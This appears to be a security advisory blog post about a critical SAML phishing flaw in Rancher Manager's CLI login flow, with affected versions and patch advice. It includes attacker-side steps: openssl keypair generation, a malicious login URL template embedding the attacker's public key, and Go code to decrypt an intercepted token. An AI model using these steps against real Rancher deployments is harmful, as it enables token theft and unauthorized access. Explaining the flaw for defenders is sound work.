Listen to this Post
The vulnerability exploits the SAML authentication flow between Rancher Manager and the Rancher CLI. When a user initiates a login via the CLI, the tool generates a requestId and a publicKey, then provides a URL to complete authentication in a browser. An attacker can craft a malicious phishing URL with their own controlled publicKey and requestId. If a victim is tricked into using this URL, the SAML authentication process completes normally from the user’s perspective. However, the resulting Rancher authentication token is encrypted with the attacker’s public key. The attacker, who possesses the corresponding private key, can decrypt the intercepted token, gaining unauthorized access to the victim’s privileges within Rancher. This attack bypasses typical phishing detection as the login page appears legitimate.
Platform: Rancher Manager
Version: < v2.12.2, < v2.11.6, < v2.10.10, < v2.9.12
Vulnerability: SAML Auth Phishing
Severity: Critical
date: 2024
Prediction: Patch Available
What Undercode Say:
rancher login https://rancher.example.com --token
Attacker generates keypair openssl genrsa -out attacker_priv.pem 2048 openssl rsa -in attacker_priv.pem -pubout -out attacker_pub.pem
Malicious URL structure https://rancher.example.com/dashboard/auth/login?requestId=attacker-controlled-id&publicKey=$(cat attacker_pub.pem | base64 -w 0)&responseType=saml
// Example decryption logic (attacker side) ciphertext, _ := base64.StdEncoding.DecodeString(interceptedToken) plaintext, _ := rsa.DecryptOAEP(sha256.New(), rand.Reader, privateKey, ciphertext, nil)
How Exploit:
Phishing URL crafted.
Victim authenticates via URL.
Token encrypted with attacker’s key.
Attacker decrypts token.
Protection from this CVE
Update Rancher Manager.
Verify CLI requestId match.
User awareness training.
Impact:
Privilege Escalation
Token Theft
Unauthorized Access
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
